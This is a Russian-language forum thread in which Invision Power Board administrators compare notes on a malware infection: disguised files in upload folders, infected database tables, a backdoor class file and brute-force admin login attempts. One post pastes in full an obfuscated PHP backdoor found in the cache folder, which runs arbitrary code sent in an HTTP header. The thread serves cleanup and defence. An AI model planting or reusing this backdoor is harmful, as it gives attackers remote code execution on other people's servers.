Jump to content
Дизайн и модификация Invision Power Board IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...

Recommended Posts

Не хочу показаться невнимательным, но я не нашел

Share this post


Link to post
Share on other sites

заметил на днях:

в /uploads/monthly 03_2013 (могут оказаться и другие директории)

файлы с точно такими же именами как и jpg, но имебщие расширение .ipb

внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)

лечение - удалить

  • Upvote 1

Share this post


Link to post
Share on other sites

Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.

Share this post


Link to post
Share on other sites

Здравствуйте.

Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..

Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием

<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>

, удалил.

Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?

Share this post


Link to post
Share on other sites

Профи, помогите пожалуйста решить эту проблемку!

Share this post


Link to post
Share on other sites

Прочтите тему эту от А до Я.

 

Ваше решение.

 

Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile

и пробежитесь по аватарам.

Share this post


Link to post
Share on other sites

Спасибо.

В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php

с содержанием -

<?php

class alpha
{
public function getOutput()
{
    $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();

       $js = <<<JS

			<script type='text/javascript'>
				$('alpha_switch').observe('click', function(){
						if( $('member_alpha_ru') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

				$('alpha_switch_en').observe('click', function(){
						if( $('member_alpha') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

JS;
       if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
       {
           $js .= <<<JS
				$('member_alpha').toggle();
JS;
       }
       else
       {
           $js .= <<<JS
				$('member_alpha_ru').toggle();
JS;
       }

       $js .= <<<JS
			</script>
JS;

       return $template . $js;
}
}

Это тоже оно? Вроде бы раньше не было ..

Share this post


Link to post
Share on other sites

Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -

photo-128.jpg и tmpgw4ia4

почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Share this post


Link to post
Share on other sites

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Это файл ибровского хука "Русские буквы в списке юзеров"

Share this post


Link to post
Share on other sites

Вчера обнаружил массовые попытки войти в АЦ форума под отображаемым именем админа с IP:37.1.207.98 . Покурив интернет понял, что не у меня одного ..

Share this post


Link to post
Share on other sites

Поменяйте путь в АЦ

Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.

Edited by Minnow

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...